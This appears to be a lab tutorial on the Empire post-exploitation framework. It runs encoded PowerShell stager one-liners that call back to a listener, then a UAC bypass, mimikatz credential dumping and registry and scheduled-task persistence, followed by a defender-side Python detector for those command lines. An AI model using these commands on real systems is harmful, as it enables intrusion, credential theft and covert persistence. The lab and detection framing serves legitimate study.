How to hack with PowerShell is a common question. PowerShell is powerful, and therefore dangerous in the world of security. On top of that it is everywhere: it is installed on Windows machines by default. Now imagine tools that allow the ethical hacker to run PowerShell in memory without being detected. One such tool, with a great support community behind it, is Empire. This post covers how to use the post-exploitation framework Empire with Kali Linux.
Here’s What You Need
Hosts
Don’t have a 2016 Domain Controller virtual machine yet? See the easy guide for setting up the 2016 Server.
- Windows 7 Virtual Machine
- Kali Linux Virtual Machine
- Windows 2016 Server Virtual Machine
- DNS, AD DS, DHCP Roles Enabled
Networking
Using VirtualBox, the only network adapter we use is the internal network, intnet. The 2016 server acts as the DHCP server while the other virtual hosts act as DHCP clients, so they receive IP addresses in the small virtual subnet 10.0.0.1/24.
Getting Started
root@kali:~# git clone https://github.com/EmpireProject/Empire
Now run the bash script to install the package.
root@kali:~/Empire# sudo ./setup/install.sh
Empire can also be run from its Docker image instead of a regular setup. This is done with the docker pull command.
root@kali:~/Empire# ls
changelog Dockerfile lib plugins setup
data empire LICENSE README.md VERSION
Notice that “empire” is highlighted in bright green-yellow in the listing, which means it is an executable. Let’s run it as root.
root@kali:~/Empire# sudo ./empire
Looking through the output of the “help” command, you can see there are many available commands.
(Empire) > list
(Empire) > listeners
[!] No listeners currently active
(Empire: listeners) >
The Quickstart page in the project wiki gives instructions for setting up Empire.
Listeners
There is an option to use HTTPS for listeners. To take advantage of it, run the certificate script, cert.sh. The script creates a PEM-formatted certificate in data/ along with the certificate’s private key in a PEM-formatted .key file.
root@kali:~/Empire# sudo ./setup/cert.sh
[*] Certificate written to ../data/empire-chain.pem
[*] Private key written to ../data/empire-priv.key
We need to configure a listener as the first step of using Empire.
(Empire) > uselistener http
(Empire) > info
There is a lot of similarity between Empire and Metasploit; the commands are almost identical in some cases. For example, at this stage the listener options are set with the set command.
# list the active listeners
(Empire) > listeners
[!] No listeners currently active
# set the listener type to use
(Empire: listeners) > uselistener http
# start the listener
(Empire: listeners/http) > execute
# now try listing the active listeners
(Empire) > listeners
Now that our setup has an active listener configured, the next concept is Stagers.
Browsing to the newly hosted URL <kali IP address> from another virtual machine leads to a page imitating a Windows IIS server. Requests to the URL are logged by Empire and displayed in the terminal.
# request to the listener URL logged
(Empire: listeners) > [!] favicon.ico requested by 10.0.1.7 with no routing packet.
Stagers
There is one setting marked Required: Yes that has no default value. In other words, we have to set it ourselves!
(Empire) > usestager multi/launcher
(Empire: stager/multi/launcher) > info
Name: Launcher
Description:
Generates a one-liner stage0 launcher for Empire.
Listener True Listener to generate stager for.
Set Listener.
(Empire: stager/multi/launcher) > set Listener http
Now run the stager.
(Empire: stager/multi/launcher) > execute
powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBlAHIAcwBJAG8ATgBUAEEAQgBsAEUALgBQAFMAVgBFAHIAUwBpAE8ATgAuAE0AQQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABHAFAARgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUATQBiAEwAWQAuAEAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAU...==
(Empire: stager/multi/launcher) > [*] Sending POWERSHELL stager (stage 1) to 10.0.1.9
[*] New agent FK9LE3C5 checked in
[+] Initial agent FK9LE3C5 from 10.0.1.9 now active (Slack)
[*] Sending agent (stage 2) to FK9LE3C5 at 10.0.1.9
Agents
(Empire: stager/multi/launcher) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen
---- -- ----------- ------------ -------- ------- --- ----- ---------
FK9LE3C5 ps 10.0.1.9 SKIPPY-PC skippy-PC\skippy powershell 2260 5/0.0 2019-04-04 20:05:19
Rename the agent for ease of use.
(Empire: agents) > rename FK9LE3C5 Agent1
(Empire: agents) > interact Agent1
Try to run mimikatz.
(Empire: Agent1) > mimikatz
[!] Error: module needs to run in an elevated context.
Type usemodule <tab>.
(Empire: AgentElevated) > usemodule
Display all 204 possibilities? (y or n)
code_execution/invoke_dllinjection
credentials/mimikatz/golden_ticket
privesc/bypassuac
For this we can use a module with a Metasploit counterpart of the same name, bypassuac. In other words, it is an exploit that bypasses Windows User Account Control (UAC). In Empire this means it returns a new agent running with elevated privileges.
(Empire: agents) > interact AgentElevated
(Empire: AgentElevated) > mimikatz
[*] Tasked KZBVPDRA to run TASK_CMD_JOB
[*] Agent KZBVPDRA tasked with task ID 1
[*] Tasked agent AgentElevated to run module powershell/credentials/mimikatz/logonpasswords
Mimikatz runs its sekurlsa::logonpasswords command and dumps the password in cleartext. It also shows the LM, NTLM and SHA1 hashes of the user’s password.
.#####. mimikatz 2.1.1 (x86) built on Nov 12 2017 15:43:57
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(powershell) # sekurlsa::logonpasswords
Session : Interactive from 1
User Name : skippy
Domain : skippy-PC
Logon Server : SKIPPY-PC
Logon Time : 4/4/2019 7:02:30 PM
msv :
[00000003] Primary
* Username : skippy
* Domain : skippy-PC
* LM : e52cac67419a9a224a3b108f3fa6cb6d
* NTLM : 8846f7eaee8fb117ad06bdd830b7586c
* SHA1 : e8f97fba9104d1ea5047948e6dfb67facd9f5b73
tspkg :
* Username : skippy
* Domain : skippy-PC
* Password : password
Persistence
(Empire: AgentElevated) > usemodule persistence/userland/registry
# show requirements
(Empire: powershell/persistence/userland/registry) > info
Name: Invoke-Registry
Module: powershell/persistence/userland/registry
NeedsAdmin: False
OpsecSafe: False
Language: powershell
MinLanguageVersion: 2
Background: False
OutputExtension: None
# once again need to set Listener!
Listener True Listener to use.
Set the Listener to the http type and execute the module to establish persistence via the registry. A value is written under HKCU:\Software\Microsoft\Windows\CurrentVersion\Debug.
(Empire: powershell/persistence/userland/registry) > set Listener http
(Empire: powershell/persistence/userland/registry) > execute
Registry persistence established using listener http stored in HKCU:Software\Microsoft\Windows\CurrentVersion\Debug.
Switching gears here, let’s use a different module to establish persistence. This module uses the Windows Task Scheduler (schtasks). The module creates a scheduled task that is visible in Windows.
(Empire: AgentElevated) > usemodule persistence/elevated/schtasks
(Empire: powershell/persistence/elevated/schtasks) > info
(Empire: powershell/persistence/elevated/schtasks) > set Listener http
(Empire: powershell/persistence/elevated/schtasks) > set OnLogon True
(Empire: powershell/persistence/elevated/schtasks) > execute
SUCCESS: The scheduled task "Updater" has successfully been created.
Schtasks persistence established using listener http stored in HKLM:\Software\Microsoft\Network\debug with Updater OnLogon trigger.
Looking at the task in the Windows host’s Task Scheduler shows the action it runs:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKLM:\Software\Microsoft\Network debug).debug)))"
After a new logon event, the task fires and new agents check in:
(Empire: powershell/persistence/elevated/schtasks) > [*] Sending POWERSHELL stager (stage 1) to 10.0.1.9
[*] Sending POWERSHELL stager (stage 1) to 10.0.1.9
[*] New agent 58SPLWZ9 checked in
[+] Initial agent 58SPLWZ9 from 10.0.1.9 now active (Slack)
[*] Sending agent (stage 2) to 58SPLWZ9 at 10.0.1.9
[*] New agent G5T9HXBR checked in
[+] Initial agent G5T9HXBR from 10.0.1.9 now active (Slack)
[*] Sending agent (stage 2) to G5T9HXBR at 10.0.1.9
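As an added defender-side example (not part of the original post or the Empire project), the following Python flags the command-line traits visible in the launcher one-liner and in the scheduled task’s action above, and decodes an -enc payload so an analyst can read it. The sample command lines are constructed here from the shapes shown on this page, and the indicator names and threshold are assumptions.

```python
import base64
import re

# Command-line traits taken from the launcher and the scheduled-task action shown on this page.
# Each on its own is common in admin scripting; several together on one command line is the signal.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+(?:hidden|1)\b", re.I),
    "noninteractive": re.compile(r"-non(?:i|interactive)\b", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I),
    "iex_base64": re.compile(r"\bIEX\b.*FromBase64String", re.I),
    # Payload read back from a registry value, as with HKLM:\Software\Microsoft\Network\debug above.
    "registry_payload": re.compile(r"\(gp\s+HK(?:LM|CU):[^)]*\)", re.I),
}

def decode_encoded_command(cmdline):
    """Return the plaintext of a -enc payload (base64 over UTF-16LE), or None if absent or invalid."""
    m = INDICATORS["encoded_command"].search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_command_line(cmdline):
    """Score one process command line (e.g. from a 4688 or Sysmon event) against the indicators."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    return {
        "indicators": hits,
        "decoded": decode_encoded_command(cmdline),
        "suspicious": len(hits) >= 2,  # assumed threshold; tune to the environment
    }

def _encode_for_sample(script):
    """Build a constructed -enc payload the way PowerShell expects it (base64 over UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed samples: the scheduled-task action quoted on this page, a launcher in the page's
# "-noP -sta -w 1 -enc" shape carrying a harmless payload, and an ordinary admin command.
SAMPLES = {
    "schtask_action": r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c '
                      r'"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKLM:\Software\Microsoft\Network debug).debug)))"',
    "launcher_shape": "powershell -noP -sta -w 1 -enc " + _encode_for_sample("Write-Output 'constructed sample'"),
    "benign_admin": "powershell.exe -NoProfile -Command Get-Service",
}

if __name__ == "__main__":
    for label, cmd in SAMPLES.items():
        print(label, analyze_command_line(cmd))
```

On a live host the same findings are confirmed by inspecting the two registry locations named above and the "Updater" task's action in Task Scheduler.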
Updated For PowerShell Empire 3.0
BC-Security now maintains a fork of the original project, PowerShell Empire 3.0. See the newer post for the PowerShell Empire 3.0 tutorial.